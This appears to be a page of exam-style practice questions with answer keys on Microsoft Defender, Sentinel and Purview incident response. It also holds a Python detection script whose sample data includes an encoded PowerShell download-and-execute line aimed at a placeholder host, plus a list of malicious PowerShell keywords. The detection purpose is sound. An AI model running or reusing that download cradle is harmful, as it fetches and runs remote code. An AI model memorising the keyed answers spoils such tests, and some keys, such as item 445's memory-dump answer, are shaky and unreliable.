Multi-Selectmedium

Which TWO actions should an analyst take when a confirmed ransomware incident is detected on multiple endpoints? (Choose TWO.)

Select 2 answers
A.Run a full antivirus scan on all endpoints.
B.Isolate affected endpoints using Microsoft Defender for Endpoint.
C.Block known malicious IP addresses and domains in the firewall.
D.Disconnect network cables but leave endpoints powered on.
E.Shut down all affected endpoints to prevent data loss.
AnswersB, C

Immediately contains the threat by isolating devices.

Why this answer

Option B is correct because isolating the endpoints through Defender for Endpoint cuts their network access at once while keeping the sensor connection needed for investigation. Option C is correct because blocking the known command-and-control and payload indicators at the firewall limits spread and further staging. Option A is wrong because an antivirus scan is reactive and does nothing to contain encryption already in progress.

Option D is wrong because pulling cables does not stop encryption already running locally, is a manual per-machine step that does not scale across multiple endpoints, and cuts off the remote management you still need. Option E is wrong because powering off destroys volatile evidence such as memory contents and can leave partially encrypted files unrecoverable.

443
MCQhard

You are handling an incident where a user's account was used to access sensitive data from an unusual location. Microsoft Entra ID Identity Protection flagged the sign-in as risky. You need to determine if the account is compromised. Which investigation step should you perform first?

A.Block the user from signing in
B.Force a password reset for the user
C.Check if the device used is managed by Intune
D.Review the sign-in details and compare with the user's typical behavior
AnswerD

Determines if the sign-in is anomalous.

Why this answer

Option D is correct because comparing the sign-in's location, device, application and time with the user's normal pattern is what establishes whether the sign-in is truly anomalous or an explainable event such as travel or a VPN. Option A is wrong because blocking the user before the sign-in is confirmed malicious is premature and disruptive. Option B is wrong because forcing a password reset before confirming compromise may tip off an attacker and does not tell you whether the account was actually misused.

Option C is wrong because the device may legitimately be the user's unmanaged personal device, so management status alone does not prove compromise.

444
MCQhard

Your organization is using Microsoft Defender for Cloud to protect Azure workloads. A critical vulnerability was discovered in a virtual machine that is part of a production application. The vulnerability has a high severity score and is actively being exploited in the wild. You need to respond quickly to mitigate the risk. What is the most effective immediate action?

A.Apply the vendor patch immediately during business hours.
B.Enable just-in-time (JIT) VM access in Microsoft Defender for Cloud to lock down inbound traffic.
C.Modify the network security group (NSG) to block all inbound traffic to the VM.
D.Use the 'Remediate' option in Defender for Cloud to automatically apply the patch.
AnswerB

JIT reduces exposure by keeping inbound management ports closed in the NSG and opening them only on approved request, for a limited time and from the requested source.

Why this answer

Enabling just-in-time (JIT) VM access reduces the attack surface immediately by closing inbound management ports until an access request is approved, which limits who can reach the vulnerable VM while the patch is scheduled. Option A is incorrect because patching a production VM during business hours risks disruption, and patching follows the containment step rather than replacing it. Option C is incorrect because blocking all inbound traffic would also cut off the production application's legitimate users.

Option D is incorrect because Defender for Cloud surfaces the vulnerability as a recommendation; it does not install OS patches itself. Note that JIT is containment, not remediation: the vulnerability remains until the patch is applied.

445
MCQmedium

During a security incident, you need to collect forensic evidence from a compromised Windows device. Which Microsoft Defender for Endpoint action should you use to collect a memory dump?

A.Initiate Live Response
B.Isolate device
C.Collect investigation package
D.Run antivirus scan
AnswerC

The investigation package bundles forensic artifacts from the device in a single action.

Why this answer

Option C is correct because 'Collect investigation package' is the one built-in action that gathers forensic data (running processes, network connections, autoruns, prefetch files, scheduled tasks, event logs and similar artifacts) and makes it available for download. Note that the package does not contain a full memory image; capturing one requires Live Response to upload and run a memory-acquisition tool on the device. Option D is wrong because 'Run antivirus scan' only scans for malware. Option B is wrong because 'Isolate device' disconnects the device from the network but collects nothing.

Option A is wrong because 'Initiate Live Response' provides a remote shell for ad-hoc collection but has no single 'collect memory dump' command.

446
MCQhard

Your organization uses Microsoft Purview to manage insider risk. A user is suspected of exfiltrating data via email. The incident response team needs to preserve a copy of the user's mailbox for legal hold. Which action should be taken?

A.Place the mailbox on an eDiscovery hold.
B.Place the mailbox on litigation hold.
C.Disable the user's multi-factor authentication to prevent access.
D.Apply a Microsoft Purview retention policy to the user's mailbox.
AnswerB

Litigation hold preserves all mailbox content, including deleted items, for legal purposes.

Why this answer

Option B is correct because a litigation hold preserves all mailbox content, including deleted and modified items, until the hold is removed, which is what legal preservation requires. Option A is wrong because an eDiscovery hold is scoped to a case and to query-based or specific content rather than being the direct way to preserve the whole mailbox. Option D is wrong because retention policies govern retention across broad locations and are not a targeted legal preservation for one user.

Option C is wrong because disabling MFA weakens protection on a suspect account and preserves nothing.

447
MCQeasy

Refer to the exhibit. You are deploying this analytics rule in Microsoft Sentinel. Which activity will trigger an alert?

A.cmd.exe launching winword.exe
B.Any process creation event
C.Winword.exe execution
D.Any cmd.exe execution
E.Word launching cmd.exe
AnswerE

Exactly matches the query.

Why this answer

The query detects when cmd.exe is created by winword.exe, indicating a potential macro-based attack. It does not look for other processes or parent processes.
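As an added example that is not part of the original page and not one of Microsoft's hunting queries, the Python below runs two of this page's detections over a constructed batch of events shaped like the DeviceProcessEvents table: the parent/child rule from question 447 (cmd.exe created by winword.exe) and the encoded-command check from question 440, which also decodes the -EncodedCommand payload the way an analyst would. The event rows, command lines, device names, the example.invalid URL and the indicator list are all constructed for the example; the flag handling covers the -e/-ec/-enc abbreviations PowerShell accepts, which goes slightly beyond the literal '-enc' in the question.

```python
import base64
import re
from typing import Dict, List, Optional

# Tokens that commonly co-occur with malicious encoded PowerShell (constructed list).
SUSPICIOUS_TOKENS = ("invoke-expression", "iex", "net.webclient", "downloadstring",
                     "frombase64string", "-w hidden", "-nop")

# powershell.exe accepts abbreviated forms of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                      re.IGNORECASE)


def ps_encode(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64.
    Used here only to construct the sample data below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed rows in the shape of DeviceProcessEvents (hypothetical, not page data).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"DeviceName": "ws01", "InitiatingProcessFileName": "winword.exe", "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe /c powershell -nop -w hidden -enc "
     + ps_encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    {"DeviceName": "ws01", "InitiatingProcessFileName": "cmd.exe", "FileName": "winword.exe",
     "ProcessCommandLine": "winword.exe /q"},
    {"DeviceName": "ws02", "InitiatingProcessFileName": "explorer.exe", "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe"},
    {"DeviceName": "ws02", "InitiatingProcessFileName": "explorer.exe", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -EncodedCommand RwBlAHQALQBEAGEAdABlAA=="},
    {"DeviceName": "srv01", "InitiatingProcessFileName": "svchost.exe", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]


def decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse -EncodedCommand; None if the blob is not valid base64 / UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze_encoded_command(cmdline: str) -> Optional[Dict[str, object]]:
    """Decoded payload plus matching indicators for a command line using -enc, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    decoded = decode_encoded_command(blob)
    if decoded is None:
        return {"decoded": None, "indicators": ["undecodable_payload"]}
    # Scan the payload plus the outer command line with the base64 blob removed,
    # so letters inside the blob cannot produce false token hits.
    haystack = (decoded + " " + cmdline.replace(blob, "")).lower()
    return {"decoded": decoded, "indicators": [t for t in SUSPICIOUS_TOKENS if t in haystack]}


def parent_child_matches(events, parent: str, child: str) -> List[Dict[str, str]]:
    """The rule from the exhibit: `child` created by `parent`, and nothing else."""
    return [e for e in events
            if e["InitiatingProcessFileName"].lower() == parent.lower()
            and e["FileName"].lower() == child.lower()]


def hunt(events) -> List[Dict[str, object]]:
    """Run both detections over a batch of events and return one finding per hit."""
    findings: List[Dict[str, object]] = []
    for e in parent_child_matches(events, "winword.exe", "cmd.exe"):
        findings.append({"rule": "winword_spawns_cmd", "device": e["DeviceName"],
                         "detail": e["ProcessCommandLine"]})
    for e in events:
        result = analyze_encoded_command(e["ProcessCommandLine"])
        if result is not None:
            findings.append({"rule": "encoded_command", "device": e["DeviceName"],
                             "detail": result["decoded"], "indicators": result["indicators"]})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The decoded payload matters more than the presence of the flag: management tooling also uses -EncodedCommand, so the indicator list is what separates the harmless Get-Date row from the download cradle launched by Word. Note also that the parent/child rule does not fire for the row where cmd.exe launches winword.exe, matching the explanation above.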

448
MCQmedium

You are investigating a suspicious sign-in reported in Microsoft Defender for Cloud Apps. The activity shows that a user accessed a sensitive SharePoint site from an anonymous IP address. What is the most effective immediate response to prevent further access?

A.Suspend the user account in Microsoft 365 Defender.
B.Change the SharePoint site permissions to remove the user's access.
C.Disable the user's device in Microsoft Intune.
D.Add the anonymous IP address to the blocked IP address list in Conditional Access.
AnswerA

Suspending the user immediately revokes access to all cloud apps until further investigation.

Why this answer

Option A is correct because suspending the user immediately revokes access to all cloud apps from any device or IP, pending investigation. Option C is wrong because disabling one device does not prevent access from other devices. Option B is wrong because changing permissions on one site does not address the account's likely compromise or its access elsewhere.

Option D is wrong because blocking a single anonymous IP is easily bypassed by an attacker moving to a different exit node.

449
MCQhard

During a ransomware incident, a security analyst needs to isolate an affected Windows 10 device managed by Microsoft Intune. The device is currently online and connected to the corporate network. Which remediation action should be taken from Microsoft Defender XDR to achieve this?

A.Block the device in Microsoft Intune
B.Initiate device isolation from the Microsoft Defender for Endpoint console
C.Disable the Windows Firewall via Intune
D.Run a full antivirus scan from Microsoft Defender for Endpoint
AnswerB

Device isolation blocks all network traffic except to the Defender service, containing the threat.

Why this answer

Option B is correct because device isolation in Microsoft Defender for Endpoint disconnects the device from the network while keeping its connection to the Defender service, so the analyst can keep investigating and later release it. Option D is wrong because a full antivirus scan does not isolate the device. Option C is wrong because turning off Windows Firewall increases exposure.

Option A is wrong because blocking the device in Intune revokes its access to corporate resources but leaves it on the network, free to spread laterally.

450
Multi-Selectmedium

Which THREE of the following are valid incident response actions in Microsoft Defender XDR?

Select 3 answers
A.Isolate a device.
B.Reset user password.
C.Block a malicious URL.
D.Delete an email message.
E.Disable a user account.
AnswersA, D, E

Isolation is a response action available in Defender XDR.

Why this answer

Options A, D, and E are correct because isolating a device, deleting an email message, and disabling a user account are response actions available from the Defender XDR portal. Option B is wrong because resetting a password is done in Microsoft Entra ID. Option C is wrong because blocking a URL is configured in Defender for Office 365, not as a Defender XDR incident response action.
